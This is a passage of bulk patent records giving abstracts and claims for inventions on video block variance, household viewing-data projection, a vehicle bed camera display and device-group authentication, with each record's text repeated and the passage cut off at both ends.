determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 16. The computer system of claim 10, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 17. The computer system of claim 16, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 18. The computer system of claim 10, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 19. A non-transitory computer-readable medium storing instructions that, when executed by a processor, cause the processor to execute a method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 20. The non-transitory computer-readable medium of claim 19, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. | 2,400 |
9,196 | 9,196 | 16,035,527 | 2,421 | Techniques for projecting household-level viewing events are described herein. Population data may be accessed including classes of a plurality of demographic attributes for households in a market. Representative household units (RHUs) may be generated, and the RHUs may be assigned a class for each of the demographic attributes and a quota based on the demographic attributes of a plurality of panelist households. Each of the panelist households may be assigned to one of the RHUs based on at least one panelist classes matching the classes for respective demographic attributes of the RHU, and the number of matching panelist households assigned to each of the RHU may be based on the quota. Panelist viewing data representing viewing events associated with the panelist household may be accessed. A report may be generated with the classes of the RHUs and the panelist viewing data of the assigned panelist households. | 1. A system, comprising:
at least one processor; and at least one memory storing instructions that, when executed, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market;
generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes;
access a panelist class of each of the first and second demographic attributes for first and second panelist households;
match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU;
assign the first panelist household to the first RHU;
determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and demographic attributes for any RHU;
match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU;
assign the second panelist household to the first RHU;
access panelist viewing data representing viewing events associated with the first and second panelist households; and
generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 2. The system of claim 1, wherein the first demographic attribute includes include one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 3. The system of claim 1, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 4. The system of claim 1, wherein the population data includes classes for a third demographic attributes of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. 5. The system of claim 5, wherein the third demographic attribute includes a number of television sets. 6. The system of claim 1, wherein each viewing event in the panelist viewing data includes an identification of a media, an advertisement, a website, an app, a network, and/or a program associated with the viewing event and a time duration that the panelist household was exposed to the viewing event. 7. The system of claim 1, wherein the viewing event occurs on one or more of a television, a mobile phone, a tablet, and a smart watch. 8. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to generate a quota based on the number of households with the demographic attributes of the RHU relative to the number of households in the market, wherein the number of matching panelist households assigned to each RHU is based on the quota. 9. The system of claim 9, wherein the instructions, when executed, further cause the at least one processor to stop assigning panelists households to an RHU based on the number of matching panelist households meeting the quota of the RHU. 10. The system of claim 9, wherein the instructions, when executed, further cause the at least one processor to duplicate the viewing data of the at least one first panelist households for an RHU based on the number of matching panelist households assigned to the RHU being less than the quota after the plurality of panelist households are assigned. 11. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to determine that the panelist households are active based on viewing data accessed from a predetermined period of time, wherein only active panelist households are assigned to the RHUs. 12. The system of claim 1, wherein the population data is received from one or more of a credit bureau and a census bureau. 13. A computer-implemented process, comprising:
accessing population data including classes for each of first and second demographic attributes of households in a market; generating an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; accessing a panelist class of each of the first and second demographic attributes for first and second panelist households; matching the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assigning the first panelist household to the first RHU; determining that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assigning the second panelist household to the first RHU; accessing panelist viewing data representing viewing events associated with the first and second panelist households; and generating a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 14. The computer-implemented process of claim 13, wherein the first demographic attribute includes include one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 15. The computer-implemented process of claim 13, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 16. The computer-implemented process of claim 13, wherein the population data includes classes for a third demographic attributes of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the process further includes:
determining that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determining that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assigning the third panelist household to the first RHU. 17. A computer-readable medium comprising computer-executable instructions which, when executed by at least one processor, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market; generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; access a panelist class of each of the first and second demographic attributes for first and second panelist households; match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assign the first panelist household to the first RHU; determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and demographic attributes for any RHU; match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assign the second panelist household to the first RHU; access panelist viewing data representing viewing events associated with the first and second panelist households; and generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 18. The computer-readable medium of claim 17, wherein the first demographic attribute includes include one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 19. The computer-readable medium of claim 17, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 20. The computer-readable medium of claim 17, wherein the population data includes classes for a third demographic attributes of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. | Techniques for projecting household-level viewing events are described herein. Population data may be accessed including classes of a plurality of demographic attributes for households in a market. Representative household units (RHUs) may be generated, and the RHUs may be assigned a class for each of the demographic attributes and a quota based on the demographic attributes of a plurality of panelist households. Each of the panelist households may be assigned to one of the RHUs based on at least one panelist classes matching the classes for respective demographic attributes of the RHU, and the number of matching panelist households assigned to each of the RHU may be based on the quota. Panelist viewing data representing viewing events associated with the panelist household may be accessed. A report may be generated with the classes of the RHUs and the panelist viewing data of the assigned panelist households.1. A system, comprising:
at least one processor; and at least one memory storing instructions that, when executed, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market;
generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes;
access a panelist class of each of the first and second demographic attributes for first and second panelist households;
match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU;
assign the first panelist household to the first RHU;
determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and demographic attributes for any RHU;
match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU;
assign the second panelist household to the first RHU;
access panelist viewing data representing viewing events associated with the first and second panelist households; and
generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 2. The system of claim 1, wherein the first demographic attribute includes include one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 3. The system of claim 1, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 4. The system of claim 1, wherein the population data includes classes for a third demographic attributes of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. 5. The system of claim 5, wherein the third demographic attribute includes a number of television sets. 6. The system of claim 1, wherein each viewing event in the panelist viewing data includes an identification of a media, an advertisement, a website, an app, a network, and/or a program associated with the viewing event and a time duration that the panelist household was exposed to the viewing event. 7. The system of claim 1, wherein the viewing event occurs on one or more of a television, a mobile phone, a tablet, and a smart watch. 8. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to generate a quota based on the number of households with the demographic attributes of the RHU relative to the number of households in the market, wherein the number of matching panelist households assigned to each RHU is based on the quota. 9. The system of claim 9, wherein the instructions, when executed, further cause the at least one processor to stop assigning panelists households to an RHU based on the number of matching panelist households meeting the quota of the RHU. 10. The system of claim 9, wherein the instructions, when executed, further cause the at least one processor to duplicate the viewing data of the at least one first panelist households for an RHU based on the number of matching panelist households assigned to the RHU being less than the quota after the plurality of panelist households are assigned. 11. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to determine that the panelist households are active based on viewing data accessed from a predetermined period of time, wherein only active panelist households are assigned to the RHUs. 12. The system of claim 1, wherein the population data is received from one or more of a credit bureau and a census bureau. 13. A computer-implemented process, comprising:
accessing population data including classes for each of first and second demographic attributes of households in a market; generating an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; accessing a panelist class of each of the first and second demographic attributes for first and second panelist households; matching the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assigning the first panelist household to the first RHU; determining that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assigning the second panelist household to the first RHU; accessing panelist viewing data representing viewing events associated with the first and second panelist households; and generating a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 14. The computer-implemented process of claim 13, wherein the first demographic attribute includes include one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 15. The computer-implemented process of claim 13, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 16. The computer-implemented process of claim 13, wherein the population data includes classes for a third demographic attributes of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the process further includes:
determining that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determining that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assigning the third panelist household to the first RHU. 17. A computer-readable medium comprising computer-executable instructions which, when executed by at least one processor, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market; generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; access a panelist class of each of the first and second demographic attributes for first and second panelist households; match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assign the first panelist household to the first RHU; determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and demographic attributes for any RHU; match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assign the second panelist household to the first RHU; access panelist viewing data representing viewing events associated with the first and second panelist households; and generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 18. The computer-readable medium of claim 17, wherein the first demographic attribute includes include one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 19. The computer-readable medium of claim 17, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 20. The computer-readable medium of claim 17, wherein the population data includes classes for a third demographic attributes of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. | 2,400 |
9,197 | 9,197 | 16,256,057 | 2,486 | A system for monitoring a bed of a vehicle is provided. The system includes a display, an input device, a first imaging device configured to capture one or more images of a bed of the vehicle, and a controller. The controller receives a first signal indicating a first activation of the input device, determines whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal, and instructs the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle speed is greater than the threshold and in response to the receipt of the first signal. | 1. A vehicle comprising:
a display; an input device; a first imaging device configured to capture one or more images of a bed of the vehicle; and a controller configured to
receive a first signal indicating a first activation of the input device;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 2. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 3. The vehicle of claim 2, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 4. The vehicle of claim 1, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 5. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
instruct the display to display the image of the bed for a time longer than the first predetermined time in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 6. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 7. The vehicle of claim 6, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 8. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and a receipt of the second signal. 9. The vehicle of claim 8, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 10. A system for monitoring a bed view of a vehicle, the system comprising:
one or more processors; one or more memory modules; and machine readable instructions stored in the one or more memory modules that, when executed by the one or more processors, cause the system to:
receive a first signal indicating a first activation of an input device of the vehicle;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct a display of the vehicle to display an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 11. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 12. The system of claim 11, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 13. The system of claim 10, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 14. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 15. The system of claim 14, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 16. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and a receipt of the second signal. 17. The system of claim 16, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 18. A method for monitoring a bed view of a vehicle, the method comprising:
receiving a first signal indicating a first activation of an input device of the vehicle; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the first signal; determining whether the vehicle is moving forward; and displaying, on a display of the vehicle, an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 19. The method of claim 18, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 20. The method of claim 18, comprising:
receiving a second signal indicating a second activation of the input device after receiving the first signal; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determining whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and displaying the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and a receipt of the second signal. | A system for monitoring a bed of a vehicle is provided. The system includes a display, an input device, a first imaging device configured to capture one or more images of a bed of the vehicle, and a controller. The controller receives a first signal indicating a first activation of the input device, determines whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal, and instructs the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle speed is greater than the threshold and in response to the receipt of the first signal.1. A vehicle comprising:
a display; an input device; a first imaging device configured to capture one or more images of a bed of the vehicle; and a controller configured to
receive a first signal indicating a first activation of the input device;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 2. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 3. The vehicle of claim 2, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 4. The vehicle of claim 1, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 5. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
instruct the display to display the image of the bed for a time longer than the first predetermined time in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 6. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 7. The vehicle of claim 6, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 8. The vehicle of claim 1, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and a receipt of the second signal. 9. The vehicle of claim 8, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the controller to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 10. A system for monitoring a bed view of a vehicle, the system comprising:
one or more processors; one or more memory modules; and machine readable instructions stored in the one or more memory modules that, when executed by the one or more processors, cause the system to:
receive a first signal indicating a first activation of an input device of the vehicle;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct a display of the vehicle to display an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 11. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 12. The system of claim 11, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 13. The system of claim 10, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 14. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 15. The system of claim 14, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 16. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and a receipt of the second signal. 17. The system of claim 16, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 18. A method for monitoring a bed view of a vehicle, the method comprising:
receiving a first signal indicating a first activation of an input device of the vehicle; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the first signal; determining whether the vehicle is moving forward; and displaying, on a display of the vehicle, an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 19. The method of claim 18, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 20. The method of claim 18, comprising:
receiving a second signal indicating a second activation of the input device after receiving the first signal; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determining whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and displaying the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and a receipt of the second signal. | 2,400 |
9,198 | 9,198 | 16,293,541 | 2,434 | Some embodiments provide a method for a first device to join a group of related devices. The method receives input of a password for an account with a centralized entity and a code generated by a second device in the group. When the second device determines that the code input on the first device matches the generated code, the method receives an authentication code from the second device for authorizing the first device with the entity as a valid device for the account. The method uses the password and information regarding the first device to generate an application to the group. After sending the application to the second device, the method receives information from the second device that enables the first device to add itself to the group. The second device verifies the generated application, and the method uses the information received from the second device to join the group. | 1-20. (canceled) 21. A method comprising:
displaying, by a first device, a first code for entry on a second device of a group of related devices; receiving, by the first device and from the second device, a second code, the second code being received responsive to the first code being input on the second device; using, by the first device, the second code to authorize the first device as a valid device for a particular account with a centralized entity; transmitting, by the first device and to the second device, a message associated with joining the group of related devices; receiving, from the second device, the message signed with a private key corresponding to the particular account; and using, by the first device, the message to join the group of related devices. 22. The method of claim 21, further comprising:
prior to using the message to join the group of related devices, signing the message with a private key of the first device. 23. The method of claim 22, wherein the message comprises an application to join the group of related devices and using the message to join the group of related devices comprises:
transmitting, by the first device, the message to the second device. 24. The method of claim 21, wherein the second device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 25. The method of claim 21, wherein the message comprises an identifier of the first device. 26. The method of claim 21, further comprising:
transmitting, by the first device and to the second device, a request to join the group of related devices that comprises the second device. 27. The method of claim 21, wherein the centralized entity is a cloud services provider and the particular account comprises a cloud services account with the cloud services provider. 28. The method of claim 21, wherein the first code is randomly generated by the first device in a manner not reproducible by the centralized entity. 29. The method of claim 21, wherein the second code is generated in a manner reproducible by the centralized entity. 30. A non-transitory machine-readable medium comprising code that, when executed by one or more processors, cause the one or more processors to perform operations, the code comprising:
code to receive, by a first device of a group of related devices, input of a first code generated by a second device that is not established in the group of related devices; code to, responsive to the input, transmit, by the first device, a second code to the second device for authorization with a centralized entity for a particular user account; code to receive, by the first device and from the second device, a message associated with joining the group of related devices, the message being signed with a private key corresponding to the particular user account; and code to establish, by the first device, the second device in the group of related devices. 31. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to, prior to receiving, by the first device, the message signed with the private key corresponding to the particular user account:
receive, by the first device and from the second device, the message associated with joining the group of related devices, the message not being signed with the private key corresponding to the particular user account;
sign, by the first device, the message with a private key corresponding to the particular user account; and
transmit, by the first device, the signed message to the second device. 32. The non-transitory machine-readable medium of claim 30, wherein the first device is previously authorized with the centralized entity as another valid device for the particular user account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 33. The non-transitory machine-readable medium of claim 30, wherein the message comprises an identifier of the second device. 34. The non-transitory machine-readable medium of claim 30, wherein the centralized entity is a cloud services provider and the particular user account comprises a cloud services account with the cloud services provider. 35. The non-transitory machine-readable medium of claim 30, wherein the first code is randomly generated by the second device in a manner not reproducible by the centralized entity. 36. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to generate, by the first device, the second code in a manner reproducible by the centralized entity. 37. A device comprising:
a memory; and at least one processor configured to:
display a first code for entry on another device of a group of related devices;
receive, from the other device, a second code, the second code being received responsive to the first code being input on the other device;
use the second code to authorize the device as a valid device for a particular account with a centralized entity;
transmit, to the other device, a message associated with joining the group of related devices;
receive, from the other device, the message signed with a private key corresponding to the particular account; and
use the message to join the group of related devices. 38. The device of claim 37, wherein the at least one processor is further configured to:
prior to using the message to join the group of related devices, sign the message with a private key of the device. 39. The device of claim 38, wherein the message comprises an application to join the group of related devices and the at least one processor is configured to use the message to join the group of related devices by:
transmitting the message to the other device. 40. The device of claim 37, wherein the other device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the other device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. | Some embodiments provide a method for a first device to join a group of related devices. The method receives input of a password for an account with a centralized entity and a code generated by a second device in the group. When the second device determines that the code input on the first device matches the generated code, the method receives an authentication code from the second device for authorizing the first device with the entity as a valid device for the account. The method uses the password and information regarding the first device to generate an application to the group. After sending the application to the second device, the method receives information from the second device that enables the first device to add itself to the group. The second device verifies the generated application, and the method uses the information received from the second device to join the group.1-20. (canceled) 21. A method comprising:
displaying, by a first device, a first code for entry on a second device of a group of related devices; receiving, by the first device and from the second device, a second code, the second code being received responsive to the first code being input on the second device; using, by the first device, the second code to authorize the first device as a valid device for a particular account with a centralized entity; transmitting, by the first device and to the second device, a message associated with joining the group of related devices; receiving, from the second device, the message signed with a private key corresponding to the particular account; and using, by the first device, the message to join the group of related devices. 22. The method of claim 21, further comprising:
prior to using the message to join the group of related devices, signing the message with a private key of the first device. 23. The method of claim 22, wherein the message comprises an application to join the group of related devices and using the message to join the group of related devices comprises:
